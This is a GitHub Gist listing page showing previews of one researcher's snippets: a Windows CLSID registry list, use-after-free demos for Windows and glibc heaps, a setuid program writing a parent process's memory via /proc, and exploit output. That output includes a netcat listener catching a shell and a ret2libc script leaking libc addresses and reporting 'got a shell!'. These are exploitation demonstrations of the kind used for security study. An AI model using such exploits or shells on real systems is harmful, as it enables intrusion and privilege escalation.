Skip to content

Instantly share code, notes, and snippets.

@inaz2
inaz2 / CLSID_Windows10EnterpriseEvaluation_10.0.19041.csv
Last active Nov 30, 2021
default CLSID/IID list (Windows 10 Enterprise Evaluation 10.0.19041)
View CLSID_Windows10EnterpriseEvaluation_10.0.19041.csv
We can't make this file beautiful and searchable because it's too large.
"Registry path","CLSID","(default)","AppID","ProgID","InprocServer32"
"HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\CLSID","CLSID","{0000031A-0000-0000-C000-000000000046}","","",""
"HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0000002F-0000-0000-C000-000000000046}","{0000002F-0000-0000-C000-000000000046}","CLSID_RecordInfo","","","C:\Windows\System32\oleaut32.dll"
"HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{00000300-0000-0000-C000-000000000046}","{00000300-0000-0000-C000-000000000046}","StdOleLink","","","combase.dll"
"HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{00000301-A8F2-4877-BA0A-FD2B6645FB94}","{00000301-A8F2-4877-BA0A-FD2B6645FB94}","PSFactoryBuffer","","","C:\Windows\system32\windowscodecs.dll"
"HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{00000303-0000-0000-C000-000000000046}","{00000303-0000-0000-C000-000000000046}","FileMoniker","","file","combase.dll"
@inaz2
inaz2 / Source.cpp
Created Jun 3, 2017
use-after-free on Low Fragmentation Heap (without /SDL, Windows 10, Visual Studio 2015)
View Source.cpp
#define WIN32_LEAN_AND_MEAN
#include <Windows.h>
#include <stdio.h>
class Cat {
char name[0x20];
public:
virtual void cry() { puts("meow"); };
};
@inaz2
inaz2 / test.c
Created Jun 3, 2017
use-after-free on glibc's ptmalloc (Ubuntu 16.04.2, Ubuntu GLIBC 2.23-0ubuntu7)
View test.c
$ lsb_release -a
No LSB modules are available.
Distributor ID: Ubuntu
Description: Ubuntu 16.04.2 LTS
Release: 16.04
Codename: xenial
$ /lib/x86_64-linux-gnu/libc.so.6
GNU C Library (Ubuntu GLIBC 2.23-0ubuntu7) stable release version 2.23, by Roland McGrath et al.
Copyright (C) 2016 Free Software Foundation, Inc.
View test.py
$ nc -v -l 4444
Listening on [0.0.0.0] (family 0, port 4444)
Connection from [127.0.0.1] port 4444 [tcp/*] accepted (family 2, sport 50250)
id
uid=1000(user) gid=1000(user) groups=1000(user),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),110(lxd),115(lpadmin),116(sambashare)
View rails4_tamper_cookie.rb
View digits_tsne_scatter.ipynb
Sorry, something went wrong. Reload?
Sorry, we cannot display this file.
Sorry, this file is invalid so it cannot be displayed.
View digits_pca_scatter.ipynb
Sorry, something went wrong. Reload?
Sorry, we cannot display this file.
Sorry, this file is invalid so it cannot be displayed.
View iris_pca_scatter.ipynb
Sorry, something went wrong. Reload?
Sorry, we cannot display this file.
Sorry, this file is invalid so it cannot be displayed.
@inaz2
inaz2 / write_ppid_memory.c
Created Jan 4, 2017
write memory of the parent process via /proc/$PPID/mem
View write_ppid_memory.c
$ gcc write_ppid_memory.c -o write_ppid_memory
$ sudo chown root write_ppid_memory
$ sudo chmod u+s write_ppid_memory
$ ls -al
-rwsr-xr-x 1 root user 8984 Jan 4 14:35 write_ppid_memory*
-rw-r--r-- 1 user user 475 Jan 4 14:28 write_ppid_memory.c
View rec.py
$ python rec.py
[+] bin_base = 56580000
[+] libc_puts = f759f140
[+] libc_system = f757a940
[+] libc_binsh = f7698e8b
[+] got a shell!
id
uid=1000(user) gid=1000(user) groups=1000(user),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),110(lxd),115(lpadmin),116(sambashare),999(docker)